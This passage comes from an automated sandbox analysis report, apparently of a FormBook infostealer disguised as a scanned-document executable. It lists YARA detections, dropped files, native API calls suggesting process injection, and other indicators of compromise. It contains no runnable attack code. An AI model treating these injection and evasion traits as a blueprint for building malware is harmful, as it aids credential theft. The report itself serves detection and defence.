Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.884104159.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malwareShow sources
Source: C:\Windows\SysWOW64\wscript.exeDropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogri.iniJump to dropped file
Source: C:\Windows\SysWOW64\wscript.exeDropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogrf.iniJump to dropped file
Source: C:\Windows\SysWOW64\wscript.exeDropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogrv.iniJump to dropped file
Malicious sample detected (through community Yara rule)Show sources
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416BC0 NtCreateFile,5_2_00416BC0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416C70 NtReadFile,5_2_00416C70
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416CF0 NtClose,5_2_00416CF0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416DA0 NtAllocateVirtualMemory,5_2_00416DA0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416BBA NtCreateFile,5_2_00416BBA
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416C6A NtReadFile,5_2_00416C6A
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416C12 NtCreateFile,5_2_00416C12
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00416CEA NtClose,5_2_00416CEA
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F62EF0 NtUnmapViewOfSection,20_2_02F62EF0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F64C41 NtUnmapViewOfSection,20_2_02F64C41
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416BC0 NtCreateFile,21_2_00416BC0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416C70 NtReadFile,21_2_00416C70
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416CF0 NtClose,21_2_00416CF0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416DA0 NtAllocateVirtualMemory,21_2_00416DA0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416BBA NtCreateFile,21_2_00416BBA
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416C6A NtReadFile,21_2_00416C6A
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416C12 NtCreateFile,21_2_00416C12
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00416CEA NtClose,21_2_00416CEA
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA2D0 NtClose,LdrInitializeThunk,21_2_00BBA2D0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA240 NtReadFile,LdrInitializeThunk,21_2_00BBA240
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA3E0 NtFreeVirtualMemory,LdrInitializeThunk,21_2_00BBA3E0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA360 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_00BBA360
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA4A0 NtUnmapViewOfSection,LdrInitializeThunk,21_2_00BBA4A0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA480 NtMapViewOfSection,LdrInitializeThunk,21_2_00BBA480
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA410 NtQueryInformationToken,LdrInitializeThunk,21_2_00BBA410
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA5F0 NtReadVirtualMemory,LdrInitializeThunk,21_2_00BBA5F0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA560 NtQuerySystemInformation,LdrInitializeThunk,21_2_00BBA560
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA540 NtDelayExecution,LdrInitializeThunk,21_2_00BBA540
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA6A0 NtCreateSection,LdrInitializeThunk,21_2_00BBA6A0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA610 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_00BBA610
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA720 NtResumeThread,LdrInitializeThunk,21_2_00BBA720
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA700 NtProtectVirtualMemory,LdrInitializeThunk,21_2_00BBA700
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA750 NtCreateFile,LdrInitializeThunk,21_2_00BBA750
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBB0B0 NtGetContextThread,21_2_00BBB0B0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA800 NtSetValueKey,21_2_00BBA800
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA2F0 NtQueryInformationFile,21_2_00BBA2F0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBBA30 NtSetContextThread,21_2_00BBBA30
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA220 NtWaitForSingleObject,21_2_00BBA220
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA260 NtWriteFile,21_2_00BBA260
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA3D0 NtCreateKey,21_2_00BBA3D0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA310 NtEnumerateValueKey,21_2_00BBA310
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA370 NtQueryInformationProcess,21_2_00BBA370
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA350 NtQueryValueKey,21_2_00BBA350
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBACE0 NtCreateMutant,21_2_00BBACE0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA430 NtQueryVirtualMemory,21_2_00BBA430
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBB410 NtOpenProcessToken,21_2_00BBB410
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA470 NtSetInformationFile,21_2_00BBA470
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBB470 NtOpenThread,21_2_00BBB470
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA460 NtOpenProcess,21_2_00BBA460
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA5A0 NtWriteVirtualMemory,21_2_00BBA5A0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA520 NtEnumerateKey,21_2_00BBA520
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBBD40 NtSuspendThread,21_2_00BBBD40
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA6D0 NtCreateProcessEx,21_2_00BBA6D0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA650 NtQueueApcThread,21_2_00BBA650
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA780 NtOpenDirectoryObject,21_2_00BBA780
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BBA710 NtQuerySection,21_2_00BBA710
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_1_00416BC0 NtCreateFile,21_1_00416BC0
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F0B084_2_010F0B08
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F1FB04_2_010F1FB0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F0E984_2_010F0E98
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F22D84_2_010F22D8
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F14144_2_010F1414
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F20514_2_010F2051
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F0F354_2_010F0F35
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4_2_010F0EF04_2_010F0EF0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_004078F05_2_004078F0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_0041B22A5_2_0041B22A
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_0041AB515_2_0041AB51
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_0041B42A5_2_0041B42A
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_0041A4D75_2_0041A4D7
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 5_2_00419E3C5_2_00419E3C
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 17_2_00B7E69817_2_00B7E698
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 17_2_00B7E68817_2_00B7E688
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 17_2_00B7BCBC17_2_00B7BCBC
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F622D820_2_02F622D8
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F60E9820_2_02F60E98
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F61FA120_2_02F61FA1
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F60B0820_2_02F60B08
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F60EF020_2_02F60EF0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F60F3520_2_02F60F35
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F6205120_2_02F62051
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 20_2_02F6141420_2_02F61414
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_004078F021_2_004078F0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_0041B22A21_2_0041B22A
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_0041AB5121_2_0041AB51
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_0041B42A21_2_0041B42A
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_0041A4D721_2_0041A4D7
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00419E3C21_2_00419E3C
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C428E821_2_00C428E8
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B8A08021_2_00B8A080
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA48CB21_2_00BA48CB
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C218B621_2_00C218B6
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BAE02021_2_00BAE020
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA002121_2_00BA0021
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA981021_2_00BA9810
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA107021_2_00BA1070
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3D01621_2_00C3D016
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C361DF21_2_00C361DF
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C419E221_2_00C419E2
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA618021_2_00BA6180
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C4D9BE21_2_00C4D9BE
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA711021_2_00BA7110
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BC990621_2_00BC9906
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA594B21_2_00BA594B
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B942B021_2_00B942B0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C422DD21_2_00C422DD
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C41A9921_2_00C41A99
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA523D21_2_00BA523D
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C30A0221_2_00C30A02
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C4E21421_2_00C4E214
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA4A5B21_2_00BA4A5B
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA4B9621_2_00BA4B96
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B7EBE021_2_00B7EBE0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA63C221_2_00BA63C2
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B9FB4021_2_00B9FB40
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3DCC521_2_00C3DCC5
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C344EF21_2_00C344EF
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3349021_2_00C33490
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C41C9F21_2_00C41C9F
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C42C9A21_2_00C42C9A
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B9141021_2_00B91410
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B8740C21_2_00B8740C
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA547E21_2_00BA547E
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C2F42B21_2_00C2F42B
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3D5D221_2_00C3D5D2
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C2FDDB21_2_00C2FDDB
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C21DE321_2_00C21DE3
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3E58121_2_00C3E581
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C1E58A21_2_00C1E58A
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B9153021_2_00B91530
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C31D1B21_2_00C31D1B
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C4251921_2_00C42519
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B70D4021_2_00B70D40
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C1C53F21_2_00C1C53F
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C426F821_2_00C426F8
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C33E9621_2_00C33E96
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3CE6621_2_00C3CE66
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA661121_2_00BA6611
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA5E7021_2_00BA5E70
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00BA4E6121_2_00BA4E61
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B9764021_2_00B97640
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C41FCE21_2_00C41FCE
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B9579021_2_00B95790
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C3278221_2_00C32782
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00B767D021_2_00B767D0
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 21_2_00C4174621_2_00C41746
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: String function: 00BCDDE8 appears 48 times
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: String function: 00B7B0E0 appears 176 times
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: String function: 00C05110 appears 38 times
PE file contains strange resourcesShow sources
Source: SKMBT 25032020 Ref- 0000019.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cookies7n1p8js.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.799680679.0000000000202000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
